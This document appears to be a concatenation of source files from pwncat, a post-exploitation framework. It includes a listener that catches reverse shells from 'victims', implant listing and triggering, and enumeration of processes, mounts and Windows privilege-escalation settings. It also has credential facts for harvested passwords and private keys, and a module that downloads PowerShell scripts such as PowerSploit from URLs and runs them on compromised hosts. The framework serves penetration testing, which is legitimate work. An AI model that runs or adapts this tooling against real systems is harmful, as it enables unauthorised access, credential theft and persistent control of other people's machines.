                # We don't want to die because of an uncaught exception, but
                # at least let the user know something happened. This should
                # probably be configurable somewhere.
                pwncat.util.console.print_exception()

    def create_listener(
        self,
        protocol: str,
        host: str,
        port: int,
        platform: Optional[str] = None,
        ssl: bool = False,
        ssl_cert: Optional[str] = None,
        ssl_key: Optional[str] = None,
        count: Optional[int] = None,
        established: Optional[Callable[[Session], bool]] = None,
    ) -> Listener:
        """
        Create and start a new background listener which will wait for connections from
        victims and optionally automatically establish sessions. If no platform name is
        provided, new ``Channel`` objects will be created and can be initialized by
        iterating over them with ``listener.iter_channels`` and initialized with
        ``listener.bootstrap_session``. If ``ssl`` is true, the socket will be wrapped in
        an SSL context. The protocol is normally ``socket``, but can be any channel
        protocol which supports a ``client`` parameter holding a socket object.

        :param protocol: the name of the channel protocol to use (default: socket)
        :type protocol: str
        :param host: the host address on which to bind
        :type host: str
        :param port: the port on which to listen
        :type port: int
        :param platform: the platform to use when automatically establishing sessions or None
        :type platform: Optional[str]
        :param ssl: whether to wrap the listener in an SSL context (default: false)
        :type ssl: bool
        :param ssl_cert: the SSL PEM certificate path
        :type ssl_cert: Optional[str]
        :param ssl_key: the SSL PEM key path
        :type ssl_key: Optional[str]
        :param count: the number of sessions to establish before automatically stopping the listener
        :type count: Optional[int]
        :param established: a callback for when new sessions are established; returning false will
                            immediately disconnect the new session.
        :type established: Optional[Callback[[Session], bool]]
        """

        listener = Listener(
            manager=self,
            address=(host, port),
            protocol=protocol,
            platform=platform,
            count=count,
            established=established,
            ssl=ssl,
            ssl_cert=ssl_cert,
            ssl_key=ssl_key,
        )

        listener.start()

        self.listeners.append(listener)

        return listener

    def create_session(self, platform: str, channel: Channel = None, **kwargs):
        r"""
        Create a new session from a new or existing channel. The platform specified
        should be the name registered name (e.g. ``linux``) of a platform class. If
        no existing channel is provided, the keyword arguments are used to construct
        a new channel.

        :param platform: name of the platform to use
        :type platform: str
        :param channel: A pre-constructed channel (default: None)
        :type channel: Optional[Channel]
        :param \*\*kwargs: keyword arguments for constructing a new channel
        :rtype: Session
        :raises:
            ChannelError: there was an error while constructing the new channel
            PlatformError: construction of a platform around the channel failed
        """

        session = Session(self, platform, channel, **kwargs)

        # Increment the ``session_id`` variable upon adding a new session
        # Session constructor will automatically grab the current
        # ``session_id`` from the ``manager`` object passed as the first argument

        self.session_id += 1

        return session

    def find_session_by_channel(self, channel: Channel):
        """
        Locate a session by it's channel object. This is mainly used when a ChannelError
        is raised in order to locate the misbehaving session object from the exception
        data.

        :param channel: the channel you are looking for
        :type channel: Channel
        :rtype: Session
        """

        for session in self.sessions.values():
            if session.platform.channel is channel:
                return session

    def _process_input(self, data: bytes, has_prefix: bool):
        """Process stdin data from the user in raw mode"""

        for byte in data:
            byte = bytes([byte])

            if has_prefix:
                # Reset prefix flag
                has_prefix = False

                if byte == self.config["prefix"].value:
                    self.target.platform.channel.send(byte)
                else:
                    try:
                        binding = self.config.binding(byte)
                    except KeyError:
                        continue

                    if binding.strip().startswith("pass"):
                        self.target.platform.channel.send(byte)
                        binding = binding.lstrip("pass")
                    else:
                        self.target.platform.interactive = False
                        # pwncat.util.restore_terminal(term_state)

                        sys.stdout.write("\n")

                        self.parser.eval(binding, "<binding>")

                        self.target.platform.channel.send(b"\n")

                        self.target.platform.interactive = True
                        # pwncat.util.enter_raw_mode()
            elif byte == self.config["prefix"].value:
                has_prefix = True
            elif data == pwncat.config.KeyType("c-d").value:
                raise RawModeExit
            else:
                self.target.platform.channel.send(byte)

        return has_prefix



#!/usr/bin/env python3
import shlex
from typing import List

from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class ProcessData(Fact):

    """A single process from the `ps` output"""

    def __init__(self, source, uid, username, pid, ppid, argv):
        super().__init__(source=source, types=["system.process"])

        self.uid: int = uid
        self.username: str = username
        self.pid: int = pid
        self.ppid: int = ppid
        self.argv: List[str] = argv

    def title(self, session):
        if self.uid == 0:
            color = "red"
        elif self.uid < 1000:
            color = "blue"
        else:
            color = "magenta"

        # Color our current user differently
        if self.uid == session.platform.getuid():
            color = "lightblue"

        result = f"[{color}]{self.username:>10s}[/{color}] "
        result += f"[magenta]{self.pid:<7d}[/magenta] "
        result += f"[lightblue]{self.ppid:<7d}[/lightblue] "
        result += f"[cyan]{shlex.join(self.argv)}[/cyan]"

        return result


class Module(EnumerateModule):
    """
    Extract the currently running processes. This will parse the
    process information and give you access to the user, parent
    process, command line, etc as with the `ps` command.

    This is only run once unless manually cleared.
    """

    PROVIDES = ["system.process"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session):

        try:
            proc = session.platform.run(
                "ps -eo pid,ppid,uid,user,command --no-header -ww",
                capture_output=True,
                text=True,
                check=True,
            )

            if proc.stdout:
                # Iterate over each process
                for line in proc.stdout.split("\n"):
                    if line:
                        line = line.strip()

                        entities = line.split()

                        try:
                            pid, ppid, uid, username, *argv = entities
                        except ValueError:
                            # We couldn't parse some line for some reason?
                            continue

                        command = " ".join(argv)
                        # Kernel threads aren't helpful for us
                        if command.startswith("[") and command.endswith("]"):
                            continue

                        uid = int(uid)
                        pid = int(pid)
                        ppid = int(ppid)

                        yield ProcessData(self.name, uid, username, pid, ppid, argv)
        except (FileNotFoundError, PermissionError):
            return



#!/usr/bin/env python3
import ssl
import datetime
import tempfile

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa

from pwncat.channel import ChannelError
from pwncat.channel.bind import Bind


class SSLBind(Bind):
    def __init__(self, certfile: str = None, keyfile: str = None, **kwargs):
        super().__init__(**kwargs)

        self.context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)

        if certfile is None and keyfile is None:
            certfile = keyfile = self._generate_self_signed_cert()

        self.context.load_cert_chain(certfile, keyfile)

        # self.server = self.context.wrap_socket(self.server)

    def _socket_connected(self, client):
        try:
            client = self.context.wrap_socket(client, server_side=True)
        except ssl.SSLError as exc:
            raise ChannelError(self, str(exc))

        super()._socket_connected(client)

    def connect(self):

        try:
            super().connect()
        except ssl.SSLError as exc:
            raise ChannelError(self, str(exc))

    def _generate_self_signed_cert(self):
        """Generate a self-signed certificate"""

        with tempfile.NamedTemporaryFile("wb", delete=False) as filp:
            key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
            filp.write(
                key.private_bytes(
                    encoding=serialization.Encoding.PEM,
                    format=serialization.PrivateFormat.TraditionalOpenSSL,
                    encryption_algorithm=serialization.NoEncryption(),
                )
            )

            # Literally taken from: https://cryptography.io/en/latest/x509/tutorial/
            subject = issuer = x509.Name(
                [
                    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
                    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
                    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"California"),
                    x509.NameAttribute(NameOID.LOCALITY_NAME, u"San Francisco"),
                    x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"My Company"),
                    x509.NameAttribute(NameOID.COMMON_NAME, u"mysite.com"),
                ]
            )
            cert = (
                x509.CertificateBuilder()
                .subject_name(subject)
                .issuer_name(issuer)
                .public_key(key.public_key())
                .serial_number(x509.random_serial_number())
                .not_valid_before(datetime.datetime.utcnow())
                .not_valid_after(
                    datetime.datetime.utcnow() + datetime.timedelta(days=365)
                )
                .add_extension(
                    x509.SubjectAlternativeName([x509.DNSName(u"localhost")]),
                    critical=False,
                )
                .sign(key, hashes.SHA256())
            )

            filp.write(cert.public_bytes(serialization.Encoding.PEM))

            return filp.name



#!/usr/bin/env python3
import pwncat
from pwncat.modules import ModuleFailed
from pwncat.facts.windows import ProcessTokenPrivilege
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule


class Module(EnumerateModule):
    """Locate process privileges"""

    PLATFORM = [Windows]
    SCHEDULE = Schedule.PER_USER
    SCOPE = Scope.SESSION
    PROVIDES = ["token.privilege"]

    def enumerate(self, session: "pwncat.manager.Session"):
        """Check for privileges"""

        # Load PowerUp.ps1
        session.run("powersploit", group="privesc")

        try:
            privs = session.platform.powershell("Get-ProcessTokenPrivilege")[0]
        except (IndexError, PowershellError) as exc:
            raise ModuleFailed(f"failed to find process token privs: {exc}")

        for priv in privs:
            yield ProcessTokenPrivilege(
                source=self.name,
                name=priv["Privilege"],
                attributes=priv["Attributes"],
                handle=priv["TokenHandle"],
                pid=priv["ProcessId"],
            )



#!/usr/bin/env python3
from typing import Optional

import pwncat
from pwncat.db import Fact


class FileReadAbility(Fact):
    """Ability to read a file as a different user"""

    def __init__(self, source, uid):
        super().__init__(types=["ability.file.read"], source=source)

        self.uid = uid

    def open(
        self,
        session,
        path: str,
        mode: str = "r",
        buffering: int = -1,
        encoding: str = "utf-8",
        errors: str = None,
        newline: str = None,
    ):
        """Open a file for reading. This method mimics the builtin open
        function, and returns a file-like object for reading."""


class FileWriteAbility(Fact):
    """Ability to write a file as a different user"""

    def __init__(self, source, uid):
        super().__init__(types=["ability.file.write"], source=source)

        self.uid = uid

    def open(
        self,
        session,
        path: str,
        mode: str = "r",
        buffering: int = -1,
        encoding: str = "utf-8",
        errors: str = None,
        newline: str = None,
    ):
        """Open a file for writing. This method mimics the builtin open
        function and returns a file-like object for writing."""


class ExecuteAbility(Fact):
    """Ability to execute a binary as a different user"""

    def __init__(self, source, uid):
        super().__init__(types=["ability.execute"], source=source)

        self.uid = uid

    def execute(self, session: "pwncat.manager.Session", path):
        """Exectue the given binary in the current session as another user"""


class SpawnAbility(Fact):
    """Ability to spawn a new process as a different user without communications"""

    def __init__(self, source, uid):
        super().__init__(types=["ability.spawn"], source=source)

    def execute(self, session: "pwncat.manager.Session", path):
        """Execute the given binary outside of this session w/ no IO"""


class EscalationStep(Fact):
    """Performs escalation to either transform the current session into
    a new user or create a new session as the requested user."""

    def __init__(self, source, uid):
        super().__init__(types=["step"], source=source)

        self.uid = uid

    def execute(
        self, session: "pwncat.manager.Session"
    ) -> Optional["pwncat.manager.Session"]:
        """Execute the escalation optionally returning a new session"""



"""
Linux specific facts which are used in multiple places throughout
the framework.
"""
from typing import List, Optional

from pwncat.facts import User, Group


class LinuxUser(User):
    """Linux-specific user definition. This augments the base
    :class:`pwncat.facts.User` class to hold data specific to
    Linux.

    :param source: the generating module name
    :type source: str
    :param name: name of the user
    :type name: str
    :param hash: password hash if known
    :type hash: Optional[str]
    :param uid: user identifier
    :type uid: int
    :param gid: group identifier
    :type gid: int
    :param comment: user comment (sometimes called full name)
    :type comment: str
    :param home: the path to the users home directory
    :type home: str
    :param shell: path to the users login shell
    :type shell: str
    :param password: the users password, if known
    :type password: str
    """

    def __init__(
        self,
        source: str,
        name: str,
        hash: Optional[str],
        uid: int,
        gid: int,
        comment: str,
        home: str,
        shell: str,
        password: Optional[str] = None,
    ):

        # Normally, the hash is only stored in /etc/shadow
        if hash == "x":
            hash = None

        super().__init__(source, name, uid, password=password, hash=hash)

        self.gid = gid
        self.comment = comment
        self.home = home
        self.shell = shell


class LinuxGroup(Group):
    """Linux-specific group definition this augments the base
    :class:`pwncat.facts.Group` class to hold data specific to
    Linux.

    :param source: the generating module name
    :type source: str
    :param group_name: name of the user
    :type group_name: str
    :param hash: password hash if known
    :type hash: Optional[str]
    :param gid: group identifier
    :type gid: int
    :param members: list of user identifiers who are members of this group
    :type members: List[int]
    :param password: the users password, if known
    :type password: str
    """

    def __init__(
        self,
        source: str,
        group_name: str,
        hash: Optional[str],
        gid: int,
        members: List[int],
        password: Optional[str] = None,
    ):

        # We've never seen a group password hash, but those apparently exist????
        if hash == "x":
            hash = None

        super().__init__(source, group_name, gid, members)

        self.hash = hash
        self.password = password



#!/usr/bin/env python3
from typing import List

import rich.markup

from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class FstabEntry(Fact):
    def __init__(self, source, spec, target, fstype, options, freq, passno, mounted):
        super().__init__(source=source, types=["system.mountpoint"])

        self.spec: str = spec
        """ The FS Specification (e.g. /dev/sda1 or UUID=XXXX) """
        self.target: str = target
        """ The target location for this mount (e.g. /mnt/mydisk or /home) """
        self.fstype: str = fstype
        """ The type of filesystem being mounted (e.g. ext4 or bind) """
        self.options: List[str] = options
        """ The list of options associated with this mount (split on comma) """
        self.freq: int = freq
        """ Whether to dump this filesystem (defaults to zero, fifth field, see fstab(5)) """
        self.passno: int = passno
        """ Order of fsck at boot time. See fstab(5) and fsck(8). """
        self.mounted: bool = mounted
        """ Whether this is currently mounted (not from fstab, but cross-referenced w/ /proc/mount) """

    def title(self, session):
        if self.mounted:
            return (
                f"[blue]{rich.markup.escape(self.spec)}[/blue] [green]mounted[/green] at "
                f"[yellow]{rich.markup.escape(self.target)}[/yellow] "
                f"as [cyan]{rich.markup.escape(self.fstype)}[/cyan]"
            )
        else:
            return (
                f"[blue]{rich.markup.escape(self.spec)}[/blue] [red]available[/red] to "
                f"mount at [yellow]{rich.markup.escape(self.target)}[/yellow] "
                f"as [cyan]{rich.markup.escape(self.fstype)}[/cyan]"
            )


class Module(EnumerateModule):
    """
    Read /etc/fstab and report on known block device mount points.
    """

    PROVIDES = ["system.mountpoint"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session):

        try:
            with session.platform.open("/etc/fstab", "r") as filp:
                for line in filp:
                    line = line.strip()
                    if line.startswith("#") or line == "":
                        continue
                    try:
                        spec, target, fstype, options, *entries = line.split()
                        # Optional entries
                        freq = int(entries[0]) if entries else "0"
                        passno = int(entries[1]) if len(entries) > 1 else "0"
                    except (ValueError, IndexError):
                        # Badly formatted line
                        continue
                    yield FstabEntry(
                        self.name,
                        spec,
                        target,
                        fstype,
                        options.split(","),
                        freq,
                        passno,
                        False,
                    )
        except (FileNotFoundError, PermissionError):
            pass



#!/usr/bin/env python3
from io import BytesIO
from pathlib import Path

import requests

import pwncat
from pwncat.modules import Bool, Argument, BaseModule, ModuleFailed
from pwncat.platform.windows import Windows


class PSModuleNotFoundError(ModuleFailed):
    def __init__(self, path):
        super().__init__(f"{path}: psmodule not found")


class Module(BaseModule):
    """
    Import a powershell module into the current powershell context.
    """

    ARGUMENTS = {
        "path": Argument(str, help="The module to load into the powershell context"),
        "force": Argument(
            Bool,
            help="Force module loading, even if it has been loaded before",
            default=False,
        ),
    }
    PLATFORM = [Windows]

    def __init__(self):
        self.imported_modules = []

    def resolve_psmodule(self, session: "pwncat.manager.Session", path: str):
        """Resolve a module name into a file-like object"""

        if path.startswith("http://") or path.startswith("https://"):
            # Load from a URL
            r = requests.get(path, stream=True)
            if r.status_code != 200:
                raise PSModuleNotFoundError(path)
            return path.split("/")[-1], BytesIO(r.content + b"\n")

        orig_path = path
        path = Path(path)

        if path.is_file():
            # Load from absolute or CWD path
            return path.name, path.open("rb")
        elif (Path(session.config["psmodules"]) / path).is_file():
            # Load from local modules directory
            return path.name, (Path(session.config["psmodules"]) / path).open("rb")
        elif len(orig_path.lstrip("/").split("/")) > 2:
            # Load from githubusercontent.com ( path = "user/repo/path/to/file.ps1" )
            orig_path = orig_path.lstrip("/").split("/")
            orig_path.insert(2, "master")
            orig_path = "/".join(orig_path)
            url = f"https://raw.githubusercontent.com/{orig_path}"
            r = requests.get(url, stream=True)

            if r.status_code != 200:
                raise PSModuleNotFoundError(orig_path)

            return (path.name, BytesIO(r.content + b"\n"))
        else:
            raise PSModuleNotFoundError(orig_path)

    def run(self, session: "pwncat.manager.Session", path, force):

        name, filp = self.resolve_psmodule(session, path)

        if name in session.platform.psmodules and not force:
            return

        session.platform.powershell(filp)

        session.platform.psmodules.append(name)



#!/usr/bin/env python3

from pwncat.db import Fact
from pwncat.modules import ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import EnumerateModule


class AlwaysInstallElevatedData(Fact):
    def __init__(self, source, enabled: bool, context: str):
        super().__init__(source=source, types=["system.alwaysinstallelevated"])

        self.enabled: bool = enabled
        self.context: str = context

    def title(self, session):
        out = (
            "AlwaysInstallElevated is " + "[bold green]enabled[/bold green]"
            if self.enabled
            else "[red]disabled[/red]"
        )
        out += f" for this {self.context}"
        return out


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["system.alwaysinstallelevated"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        registry_value = "AlwaysInstallElevated"
        registry_keys = [
            "HKCU:\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\",
            "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\",
        ]

        for registry_key in registry_keys:
            try:
                result = session.platform.powershell(
                    f"Get-ItemPropertyValue {registry_key} -Name {registry_value}"
                )

                if not result:
                    raise ModuleFailed(
                        f"failed to retrieve registry value {registry_value}"
                    )

                status = bool(result[0])

            except PowershellError as exc:
                if "does not exist" in exc.message:
                    status = bool(0)  # default
                else:
                    raise ModuleFailed(
                        f"could not retrieve registry value {registry_value}: {exc}"
                    ) from exc

            if registry_key.startswith("HKCU"):
                yield AlwaysInstallElevatedData(self.name, status, "current user")
            else:
                yield AlwaysInstallElevatedData(self.name, status, "local machine")



"""
A socket bind channel. This is slightly counter-intuitive. In this case
``bind`` is from an attacker standpoint. The attacking machine will bind, and
listing for connections from the target. In this case, the target payload
would have been a reverse shell payload.

The only required argument for a bind channel is the port number. By default,
the channel will listen on all interfaces (bound to ``0.0.0.0``).
"""
import errno
import socket

from rich.progress import Progress, BarColumn

from pwncat.channel import ChannelError
from pwncat.channel.socket import Socket


class Bind(Socket):
    """
    Implements a channel which rides over a shell attached
    directly to a socket. This channel will listen for incoming
    connections on the specified port, and assume the resulting
    connection is a shell from the victim.
    """

    def __init__(self, port: int, host: str = None, **kwargs):

        if not host or host == "":
            host = "0.0.0.0"

        if isinstance(port, str):
            try:
                port = int(port)
            except ValueError:
                raise ChannelError(self, "invalid port number")

        if port is None:
            raise ChannelError(self, "no port specified")

        super().__init__(client=None, host=host, port=port, **kwargs)

        self.address = (host, port)

        try:
            self.server = socket.create_server((host, port), reuse_port=True)
        except OSError as exc:
            error_message = str(exc)

            if exc.args[0] == errno.EACCES:
                # See `/proc/sys/net/ipv4/ip_unprivileged_port_start`
                error_message = (
                    "unable to listen on a privileged port"
                    + "\nusually ports in the range 0-1023 are restricted"
                    + "\n[green][TRY][/green]: try to run `pwncat` as `[red]root[/red]`"
                )
            elif exc.args[0] == errno.EADDRINUSE:
                error_message = "port is already in use"
            elif exc.args[0] == errno.EADDRNOTAVAIL:
                error_message = "unable to bind on given address"

            raise ChannelError(self, error_message)

    def connect(self):

        with Progress(
            f"bound to [blue]{self.host}[/blue]:[cyan]{self.port}[/cyan]",
            BarColumn(bar_width=None),
            transient=True,
        ) as progress:
            progress.add_task("listening", total=1, start=False)

            try:
                # Wait for a connection
                (client, address) = self.server.accept()
                self._socket_connected(client)
            except KeyboardInterrupt:
                raise ChannelError(self, "listener aborted")
            except socket.error as exc:
                raise ChannelError(self, str(exc))
            finally:
                self.server.close()

            progress.log(
                f"[green]received[/green] connection from [blue]{address[0]}[/blue]:[cyan]{address[1]}[/cyan]"
            )



#!/usr/bin/env python3

import rich.markup

from pwncat.db import Fact


class PasswordData(Fact):
    """A password possible extracted from a remote file
    `filepath` and `lineno` may be None signifying this
    password did not come from a file directly.
    """

    def __init__(self, source, password, filepath, lineno, uid):
        super().__init__(source=source, types=["creds.password"])

        self.password: str = password
        self.filepath: str = filepath
        self.lineno: int = lineno
        self.uid: int = uid  # We are Linux-specific here so this can be a literal UID

    def title(self, session):
        if self.password is not None:
            result = f"Potential Password [cyan]{rich.markup.escape(repr(self.password))}[/cyan]"
            if self.uid is not None:
                result += f" for [blue]{rich.markup.escape(session.find_user(uid = self.uid).name)}[/blue]"
            if self.filepath is not None:
                result += f" ({rich.markup.escape(self.filepath)}:{self.lineno})"
        else:
            result = f"Potential Password at [cyan]{rich.markup.escape(self.filepath)}[/cyan]:{self.lineno}"

        return result


class PrivateKeyData(Fact):
    """A private key found on the remote file system or known
    to be applicable to this system in some way."""

    def __init__(self, source, path, uid, content, encrypted):
        super().__init__(source=source, types=["creds.private_key"])

        self.uid: int = uid
        """ The uid we believe the private key belongs to """
        self.path: str = path
        """ The path to the private key on the remote host """
        self.content: str = content
        """ The actual content of the private key """
        self.encrypted: bool = encrypted
        """ Is this private key encrypted? """

    def title(self, session):
        if self.uid == 0:
            color = "red"
        else:
            color = "green"
        return f"Potential private key for [{color}]{self.uid}[/{color}] at [cyan]{rich.markup.escape(self.path)}[/cyan]"

    def description(self, session) -> str:
        return self.content



#!/usr/bin/env python3
import sys
import logging
import argparse
import importlib.metadata

from rich import box
from rich.table import Table
from rich.progress import Progress, SpinnerColumn

import pwncat.manager
from pwncat.util import console
from pwncat.channel import ChannelError
from pwncat.modules import ModuleFailed
from pwncat.commands import connect
from pwncat.platform import PlatformError


def main():

    # Default log-level is "INFO"
    logging.getLogger().setLevel(logging.INFO)

    parser = argparse.ArgumentParser(
        description="""Start interactive pwncat session and optionally connect to existing victim via a known platform and channel type. This entrypoint can also be used to list known implants on previous targets."""
    )
    parser.add_argument(
        "--version", "-v", action="store_true", help="Show version number and exit"
    )
    parser.add_argument(
        "--download-plugins",
        action="store_true",
        help="Pre-download all Windows builtin plugins and exit immediately",
    )
    parser.add_argument(
        "--config",
        "-c",
        type=argparse.FileType("r"),
        default=None,
        help="Custom configuration file (default: ./pwncatrc)",
    )
    parser.add_argument("--ssl", action="store_true", help="Connect or listen with SSL")
    parser.add_argument(
        "--ssl-cert",
        default=None,
        help="Certificate for SSL-encrypted listeners (PEM)",
    )
    parser.add_argument(
        "--ssl-key",
        default=None,
        help="Key for SSL-encrypted listeners (PEM)",
    )
    parser.add_argument(
        "--identity",
        "-i",
        type=argparse.FileType("r"),
        default=None,
        help="Private key for SSH authentication",
    )
    parser.add_argument(
        "--listen",
        "-l",
        action="store_true",
        help="Enable the `bind` protocol (supports netcat-style syntax)",
    )
    parser.add_argument(
        "--platform",
        "-m",
        help="Name of the platform to use (default: linux)",
        default="linux",
    )
    parser.add_argument(
        "--port",
        "-p",
        help="Alternative way to specify port to support netcat-style syntax",
    )
    parser.add_argument(
        "--list",
        action="store_true",
        help="List installed implants with remote connection capability",
    )
    parser.add_argument(
        "connection_string",
        metavar="[protocol://][user[:password]@][host][:port]",
        help="Connection string describing victim",
        nargs="?",
    )
    parser.add_argument(
        "pos_port",
        nargs="?",
        metavar="port",
        help="Alternative port number to support netcat-style syntax",
    )
    parser.add_argument(
        "--verbose",
        "-V",
        action="store_true",
        help="Enable verbose output for the remote commands executed by `pwncat`",
    )
    args = parser.parse_args()

    # Print the version number and exit.
    if args.version:
        print(importlib.metadata.version("pwncat-cs"))
        return

    # Create the session manager
    with pwncat.manager.Manager(args.config) as manager:

        if args.verbose:
            # set the config variable `verbose` to `True` (globally)
            manager.config.set("verbose", True, True)

        if args.download_plugins:
            for plugin_info in pwncat.platform.Windows.PLUGIN_INFO:
                with pwncat.platform.Windows.open_plugin(
                    manager, plugin_info.provides[0]
                ):
                    pass

            return

        if args.list:

            db = manager.db.open()
            implants = []

            table = Table(
                "ID",
                "Address",
                "Platform",
                "Implant",
                "User",
                box=box.MINIMAL_DOUBLE_HEAD,
            )

            # Locate all installed implants
            for target in db.root.targets:

                # Collect users
                users = {}
                for fact in target.facts:
                    if "user" in fact.types:
                        users[fact.id] = fact

                # Collect implants
                for fact in target.facts:
                    if "implant.remote" in fact.types:
                        table.add_row(
                            target.guid,
                            target.public_address[0],
                            target.platform,
                            fact.source,
                            users[fact.uid].name,
                        )

            if not table.rows:
                console.log("[red]error[/red]: no remote implants found")
            else:
                console.print(table)

            return

        console.log("Welcome to [red]pwncat[/red] 🐈!")

        if (
            args.connection_string is not None
            or args.pos_port is not None
            or args.port is not None
            or args.listen
            or args.identity is not None
        ):
            query_args = {}
            query_args["protocol"] = None
            query_args["user"] = None
            query_args["password"] = None
            query_args["host"] = None
            query_args["port"] = None
            query_args["platform"] = args.platform
            query_args["identity"] = args.identity
            query_args["certfile"] = args.ssl_cert
            query_args["keyfile"] = args.ssl_key
            query_args["ssl"] = args.ssl
            querystring = None

            if args.connection_string:
                m = connect.Command.CONNECTION_PATTERN.match(args.connection_string)
                query_args["protocol"] = m.group("protocol")
                query_args["user"] = m.group("user")
                query_args["password"] = m.group("password")
                query_args["host"] = m.group("host")
                query_args["port"] = m.group("port")
                querystring = m.group("querystring")

                if query_args["protocol"] is not None:
                    query_args["protocol"] = query_args["protocol"].removesuffix("://")

                if query_args["password"] is not None:
                    query_args["password"] = query_args["password"].removeprefix(":")

            if querystring is not None:
                for arg in querystring.split("&"):
                    if arg.find("=") == -1:
                        continue

                    key, *value = arg.split("=")

                    if key in query_args and query_args[key] is not None:
                        console.log(f"[red]error[/red]: multiple values for {key}")
                        return

                    query_args[key] = "=".join(value)

            if query_args["host"] is not None and query_args["host"] == "":
                query_args["host"] = None

            if query_args["protocol"] is not None and args.listen:
                console.log(
                    "[red]error[/red]: --listen is not compatible with an explicit connection string"
                )
                return
            elif args.listen:
                query_args["protocol"] = "bind"

            if (
                query_args["certfile"] is None and query_args["keyfile"] is not None
            ) or (query_args["certfile"] is not None and query_args["keyfile"] is None):
                console.log(
                    "[red]error[/red]: both a ssl certificate and key file are required"
                )
                return

            if query_args["certfile"] is not None or query_args["keyfile"] is not None:
                query_args["ssl"] = True

            if (
                query_args["protocol"]
                not in [
                    None,
                    "bind",
                    "connect",
                ]
                and query_args.get("ssl")
            ):
                console.log(
                    f"[red]error[/red]: --ssl is incompatible with an [yellow]{query_args['protocol']}[/yellow] protocol"
                )
                return
            elif query_args["protocol"] is not None and query_args.get("ssl"):
                query_args["protocol"] = "ssl-" + query_args["protocol"]

            if (
                sum(
                    [
                        query_args["port"] is not None,
                        args.port is not None,
                        args.pos_port is not None,
                    ]
                )
                > 1
            ):
                console.log("[red]error[/red]: multiple ports specified")
                return

            if args.port is not None:
                query_args["port"] = args.port
            if args.pos_port is not None:
                query_args["port"] = args.pos_port

            if query_args["port"] is not None:
                try:
                    query_args["port"] = int(query_args["port"].lstrip(":"))
                except ValueError:
                    console.log(
                        f"[red]error[/red]: {query_args['port'].lstrip(':')}: invalid port number"
                    )
                    return

            # Attempt to reconnect via installed implants
            if (
                query_args["protocol"] is None
                and query_args["password"] is None
                and query_args["port"] is None
                and args.identity is None
            ):
                db = manager.db.open()
                implants = []

                # Locate all installed implants
                for target in db.root.targets:

                    if (
                        target.guid != query_args["host"]
                        and target.public_address[0] != query_args["host"]
                    ):
                        continue

                    # Collect users
                    users = {}
                    for fact in target.facts:
                        if "user" in fact.types:
                            users[fact.id] = fact

                    # Collect implants
                    for fact in target.facts:
                        if "implant.remote" in fact.types:
                            implants.append((target, users[fact.uid], fact))

                for target, implant_user, implant in implants:
                    # Check correct query_args["user"]
                    if (
                        query_args["user"] is not None
                        and implant_user.name != query_args["user"]
                    ):
                        continue
                    # Check correct platform
                    if (
                        query_args["platform"] is not None
                        and target.platform != query_args["platform"]
                    ):
                        continue

                    manager.log(f"trigger implant: [cyan]{implant.source}[/cyan]")

                    # Attempt to trigger a new session
                    try:
                        session = implant.trigger(manager, target)
                        manager.target = session
                        used_implant = implant
                        break
                    except ModuleFailed:
                        db.transaction_manager.commit()
                        continue

            if manager.target is not None:
                manager.target.log(
                    f"connected via {used_implant.title(manager.target)}"
                )
            else:
                try:
                    manager.create_session(
                        **query_args,
                    )
                except (ChannelError, PlatformError) as exc:
                    manager.log(f"connection failed: {exc}")
                except KeyboardInterrupt:
                    # hide '^C' from the output
                    sys.stdout.write("\b\b\r")
                    manager.log("[yellow]warning[/yellow]: cancelled by user")

        manager.interactive()

        if manager.sessions:
            with Progress(
                SpinnerColumn(),
                "closing sessions",
                "•",
                "{task.fields[status]}",
                console=console,
                transient=True,
            ) as progress:
                task = progress.add_task("task", status="...")

                # Retrieve the existing session IDs list
                session_ids = list(manager.sessions.keys())

                # Close each session based on its ``session_id``
                for session_id in session_ids:
                    progress.update(
                        task, status=str(manager.sessions[session_id].platform)
                    )
                    manager.sessions[session_id].close()

                progress.update(task, status="done!", completed=100)


if __name__ == "__main__":

    main()

    sys.exit(0)



#!/usr/bin/env python3
import subprocess

import pwncat
from pwncat.commands import CommandDefinition


class Command(CommandDefinition):
    """
    Run a local shell command on your attacking machine
    """

    PROG = "local"
    ARGS = None
    LOCAL = True

    def run(self, manager: "pwncat.manager.Manager", args):
        subprocess.run(args, shell=True)



"""
Windows-specific facts which are used in multiple places throughout the framework.
"""
from enum import IntFlag
from typing import List, Callable, Optional
from datetime import datetime

import pwncat
from pwncat.facts import Fact, User, Group, ExecuteAbility
from pwncat.modules import ModuleFailed
from pwncat.platform import PlatformError


class LuidAttribute(IntFlag):
    DISABLED = 0x00000000
    SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
    SE_PRIVILEGE_ENABLED = 0x00000002
    SE_PRIVILEGE_REMOVED = 0x00000004
    SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000


class ProcessTokenPrivilege(Fact):
    """Describes a specific privilege"""

    def __init__(self, source: str, name: str, attributes: int, handle: int, pid: int):
        super().__init__(source=source, types=["token.privilege"])

        self.name = name
        self.attributes = LuidAttribute(attributes)
        self.handle = handle
        self.pid = pid

    def title(self, session: "pwncat.manager.Session"):
        attributes = str(self.attributes).removeprefix("LuidAttribute.").split("|")

        for i in range(len(attributes)):
            if attributes[i] == "DISABLED":
                attributes[i] = "[red]DISABLED[/red]"
            else:
                attributes[i] = f"[blue]{attributes[i]}[/blue]"

